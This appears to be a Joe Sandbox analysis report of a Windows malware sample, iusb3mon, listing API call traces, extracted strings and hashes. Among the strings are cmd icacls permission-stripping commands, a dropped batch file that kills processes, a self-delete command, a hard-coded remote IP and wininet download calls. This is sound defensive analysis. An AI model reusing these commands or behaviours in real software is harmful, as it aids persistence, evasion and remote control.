• lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06242901
• CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0624291E
• WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06242956
• CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0624295F
• Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0624296A
• DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0624297B
• GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0624299E
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
• String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
• API String ID: 3823570417-2945788138
• Opcode ID: de5888895639fbf4e1ccad89d7c1ec839dfa0752867169abd8912ea170504bbc
• Instruction ID: f34b754ebc5dfd7242c156841cd4fb923b20fcb4402f7724b833f7c1c132e6c7
• Opcode Fuzzy Hash: de5888895639fbf4e1ccad89d7c1ec839dfa0752867169abd8912ea170504bbc
• Instruction Fuzzy Hash: 047193219083C9EEEB11D7A8DC4DBDE7FA95F15304F044189E6946A1C2CBBA4748CB76
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                      • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                      • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427B0
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062427B9
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062427BC
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427C3
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062427D3
                                                                                                                    • LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06242849
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06242850
                                                                                                                    • GetTickCount.KERNEL32 ref: 0624289E
                                                                                                                    • GetTickCount.KERNEL32 ref: 062428D9
                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06242901
                                                                                                                    • CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0624291E
                                                                                                                    • WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06242956
                                                                                                                    • CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0624295F
                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0624296A
                                                                                                                    • DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0624297B
                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0624299E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
                                                                                                                    • String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
                                                                                                                    • API String ID: 3823570417-2945788138
                                                                                                                    • Opcode ID: d08cfa0cf5aaf5934548075787ca7757dfba62a1e9d265cab53e1b2a18361d78
                                                                                                                    • Instruction ID: 35dda4861ac55537888ad5c663e6d809befe35cd776549c203824ef74451166f
                                                                                                                    • Opcode Fuzzy Hash: d08cfa0cf5aaf5934548075787ca7757dfba62a1e9d265cab53e1b2a18361d78
                                                                                                                    • Instruction Fuzzy Hash: 9561A1308083C9EEEB12D7A8DC4DBDE7F655F16304F044189E694AA1C2C7BA4648CB76
                                                                                                                    APIs
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06241CA3
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241CDF
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg1), ref: 06241CEC
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg), ref: 06241CEF
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao), ref: 06241CF6
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\ziliao.jpg), ref: 06241CFD
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241D04
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06241D18
                                                                                                                    • LoadLibraryA.KERNEL32(0000004B,?), ref: 06241D8C
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06241D93
                                                                                                                    • GetTickCount.KERNEL32 ref: 06241DDF
                                                                                                                    • GetTickCount.KERNEL32 ref: 06241E17
                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 06241E3F
                                                                                                                    • CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 06241E56
                                                                                                                    • WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000), ref: 06241E8A
                                                                                                                    • CloseHandle.KERNEL32(00000025), ref: 06241E93
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241E9E
                                                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 06241ECA
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 06241ED7
                                                                                                                    • ExitProcess.KERNEL32 ref: 06241EDE
                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 06241F05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$Sleep$AttributesCountProcessTick$AddressCloseCreateExecExecuteExitHandleLibraryLoadModuleNameProcShellTerminateWritelstrcat
                                                                                                                    • String ID: A$C:\ProgramData\Microsoft\Program\ziliao$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Microsoft\Program\ziliao.jpg1$C:\ProgramData\Microsoft\ziliao.jpg$G$KERNEL32.dll$P$Plugin32.dll$Ru%d%s$T$a$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$e$e$h$m$open$p$t$t
                                                                                                                    • API String ID: 1333362825-3008771302
                                                                                                                    • Opcode ID: bac64167e9fcbf614c98aa0c79c532539cf02f10b7bf8ef0cc5db3e00340f955
                                                                                                                    • Instruction ID: 89468e8136631141c948c877c90f5e9231987956d46e8fffe2ee541fe2afd60c
                                                                                                                    • Opcode Fuzzy Hash: bac64167e9fcbf614c98aa0c79c532539cf02f10b7bf8ef0cc5db3e00340f955
                                                                                                                    • Instruction Fuzzy Hash: C78194618043C9EEEB51A7B4DC4CBEE7FBD5F16308F044189E694A6181C7BA4B48CB76
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 06247480
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadwsprintf
                                                                                                                    • String ID: %$C$C$Console$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                                                                    • API String ID: 1476185493-1609218977
                                                                                                                    • Opcode ID: b2a0cfa0bc9760ecafb11f0b2ae8b775336efe99f4feddf052ae6567aad96077
                                                                                                                    • Instruction ID: 98f023ac9f2fdcfc181b17f8b3a98ae3608a13cf3a6fb86261f9db10d39fb6fc
                                                                                                                    • Opcode Fuzzy Hash: b2a0cfa0bc9760ecafb11f0b2ae8b775336efe99f4feddf052ae6567aad96077
                                                                                                                    • Instruction Fuzzy Hash: 5131DF50D0C6C9DDEB02D6A888487DFBFB55B26249F0840D8D6943A282C6FF575887BA
                                                                                                                    APIs
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06243E0C
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06243E14
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E1B
                                                                                                                      • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                      • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                      • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                    • Sleep.KERNEL32(c:\del,?,?), ref: 06243E38
                                                                                                                      • Part of subcall function 062429CE: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429E4
                                                                                                                      • Part of subcall function 062429CE: WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429FC
                                                                                                                      • Part of subcall function 062429CE: CloseHandle.KERNEL32(00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06242A09
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E4B
                                                                                                                    • WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06243E53
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 06243E5A
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06243E6A
                                                                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06243E83
                                                                                                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06243E9A
                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 06243EB7
                                                                                                                    • GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?), ref: 06243F32
                                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F3F
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06243F43
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F50
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 06243F69
                                                                                                                    • SetPriorityClass.KERNEL32(?,00000040,?,?,?,?,?,?,?,?), ref: 06243F78
                                                                                                                    • SetThreadPriority.KERNEL32(?,000000F1,?,?,?,?,?,?,?,?), ref: 06243F7F
                                                                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 06243F84
                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?), ref: 06243F94
                                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F9B
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06243F9E
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243FA5
                                                                                                                    • ExitProcess.KERNEL32 ref: 06243FA8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$PriorityThread$CurrentProcess$ClassCreateExecSleep$CloseHandleNameWrite$AttributesDeleteEnvironmentExitModulePathResumeShortVariable
                                                                                                                    • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$C:\ProgramData\Microsoft\del.bat$COMSPEC$D$c:\del$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone"
                                                                                                                    • API String ID: 1606893727-1022896001
                                                                                                                    • Opcode ID: 3cba29ba3626db3db00be31b7f755177cae880b213bd111eb003f9c13fae2c99
                                                                                                                    • Instruction ID: 2624fdb7cd76a2f0135bc1365c1a62b2791445982df51527956b32e7edf2bca5
                                                                                                                    • Opcode Fuzzy Hash: 3cba29ba3626db3db00be31b7f755177cae880b213bd111eb003f9c13fae2c99
                                                                                                                    • Instruction Fuzzy Hash: 89418972951319BAEBA0ABE2EC8DEDF7B6CEF84740F010451F655E2480DA709B84CF61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06245112
                                                                                                                    • wsprintfA.USER32 ref: 06245148
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0624515A
                                                                                                                    • GetLastError.KERNEL32 ref: 06245166
                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 06245174
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0624517B
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Console,00000000,00020019,?), ref: 062451D2
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Groupfenzhu,00000000,?,00000000,?), ref: 062451F3
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06245210
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Remarkbeizhu,00000000,?,00000000,?), ref: 06245228
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06245245
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,MarkTime,00000000,?,00000000,?), ref: 0624525D
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0624526D
                                                                                                                    • _rand.LIBCMT ref: 06245288
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 06245292
                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 06245347
                                                                                                                    • lstrcatA.KERNEL32(00000000,202.79.169.178), ref: 06245370
                                                                                                                    • strcmp.MSVCRT ref: 06245382
                                                                                                                    • GetTickCount.KERNEL32 ref: 06245397
                                                                                                                    • GetTickCount.KERNEL32 ref: 062453B3
                                                                                                                    • lstrcpyA.KERNEL32(06272AD4,?,?,?,00006365,00000000), ref: 062453ED
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,?), ref: 0624543F
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0624544C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$QueryValue$CountMutexSleepTicklstrcat$CreateErrorH_prologHandleLastObjectOpenReleaseSingleWait_randlstrcpystrcmpwsprintf
                                                                                                                    • String ID: %s:%d:%s$202.79.169.178$Console$Default$Groupfenzhu$MarkTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\
                                                                                                                    • API String ID: 2892932112-3094769979
                                                                                                                    • Opcode ID: d40f165ddabe8899093bedc45fe6431cd7f5f30d4d6898108c5a0994125fcb04
                                                                                                                    • Instruction ID: d826079f0bcd3d9b4aeea8e3db782559202f884a42a56ac96f9460b85c78f07c
                                                                                                                    • Opcode Fuzzy Hash: d40f165ddabe8899093bedc45fe6431cd7f5f30d4d6898108c5a0994125fcb04
                                                                                                                    • Instruction Fuzzy Hash: 9EA1A372D2425AABDBA5FBB1DD48EEE7B7DAF04344F100166FA45B2040DB709A84CF61
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?,7508EA50), ref: 06244FB5
                                                                                                                    • wsprintfA.USER32 ref: 06245056
                                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 0624508C
                                                                                                                      • Part of subcall function 06249423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                      • Part of subcall function 06249423: FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadLocalTimelstrlenwsprintf
                                                                                                                    • String ID: $%$%$%$%$%4d-$-$.$.$.$.$2$2$2$2$:$Console$MarkTime$d$d$d$d
                                                                                                                    • API String ID: 1129135643-4086575212
                                                                                                                    • Opcode ID: cbf5ad9fe148bcacba721b8e460ac1a9929cdbf618a12553ef1be4e22ad231b7
                                                                                                                    • Instruction ID: bf3f51f23cf97c3359cc3718538ff368d48037b9e3bc2750bcdc5fb9d4361c7f
                                                                                                                    • Opcode Fuzzy Hash: cbf5ad9fe148bcacba721b8e460ac1a9929cdbf618a12553ef1be4e22ad231b7
                                                                                                                    • Instruction Fuzzy Hash: 83411F61C083D8E9EB12D7E8D80C7DEBFF91B15708F0440C5E584BA182D6BA4758C776
                                                                                                                    APIs
                                                                                                                    • DeleteFileA.KERNEL32(?,062444DD,00000000,00000001), ref: 06246344
                                                                                                                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 06246357
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0624636E
                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0624638E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0624639A
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062463BC
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 062463D9
                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 06246409
                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 06246496
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062464A8
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 062464B3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 062464BF
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062464D2
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 062464E3
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062464F3
                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 06246500
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AddressProc$Library$CloseDeleteFreeHandle$ConnectCopyCreateInternetLoadSleepWrite
                                                                                                                    • String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                    • API String ID: 1518507476-3861321592
                                                                                                                    • Opcode ID: 09e38aa438ef853368defadc9d4f72175d9a526b8c07db8efea54389a4a1fc5a
                                                                                                                    • Instruction ID: b4e165b7c6c6b240dc781561ac356e6ef13575e4bc1885e45e180fc676501135
                                                                                                                    • Opcode Fuzzy Hash: 09e38aa438ef853368defadc9d4f72175d9a526b8c07db8efea54389a4a1fc5a
                                                                                                                    • Instruction Fuzzy Hash: 935171B291021EBFEF64ABA1DC89DEE7B7DEF04654F104466FA05E2050DA709F819F60
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
                                                                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
